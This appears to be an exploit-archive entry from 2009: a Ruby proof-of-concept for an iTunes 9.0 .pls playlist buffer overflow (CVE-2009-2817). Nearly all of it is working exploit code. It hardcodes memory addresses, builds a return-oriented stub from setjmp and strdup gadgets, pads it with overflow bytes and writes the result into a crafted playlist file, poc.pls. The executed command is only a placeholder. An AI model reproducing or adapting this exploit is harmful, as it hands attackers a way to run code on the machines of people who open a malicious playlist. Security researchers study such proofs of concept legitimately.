# Exploit Title: iTunes .pls file handling buffer overflow # Date: 2009.12.20 # Author: S2 Crew [Hungary] # Software Link: - # Version: 9.0 # Tested on: OSX 10.5.8, Windows XP SP2
 (/GS flag, DOS) # CVE: CVE-2009-2817
# Code:
#!/usr/bin/env ruby
SETJMP = 0x92F04224 JMP_BUF = 0x8fe31290 STRDUP = 0x92EED110 # 8fe24459 jmp *%eax JMP_EAX = 0x8fe24459
def make_exec_payload_from_heap_stub() frag0 = "\x90" + # nop "\x58" + # pop eax "\x61" + # popa "\xc3" # ret frag1 = "\x90" + # nop "\x58" + # pop eax "\x89\xe0" + # mov eax, esp "\x83\xc0\x0c" + # add eax, byte +0xc "\x89\x44\x24\x08" + # mov [esp+0x8], eax "\xc3" # ret exec_payload_from_heap_stub = frag0 + [SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") + frag1 + "X" * 20 + [SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP, JMP_EAX].pack("V5") + "X" * 4 end
payload_cmd = "hereisthetrick" stub = make_exec_payload_from_heap_stub() ext = "A" * 59 stub = make_exec_payload_from_heap_stub() exploit = ext + stub + payload_cmd
# pls file format
file = "[playlist]\n" file += "NumberOfEntries=1\n" file += "File1=http://1/asdf." + exploit + "\n" file += "Title1=asdf\n" file += "Length1=100\n" file += "Version=2" + '\n'
File.open('poc.pls','w') do |f| f.puts file f.close end
|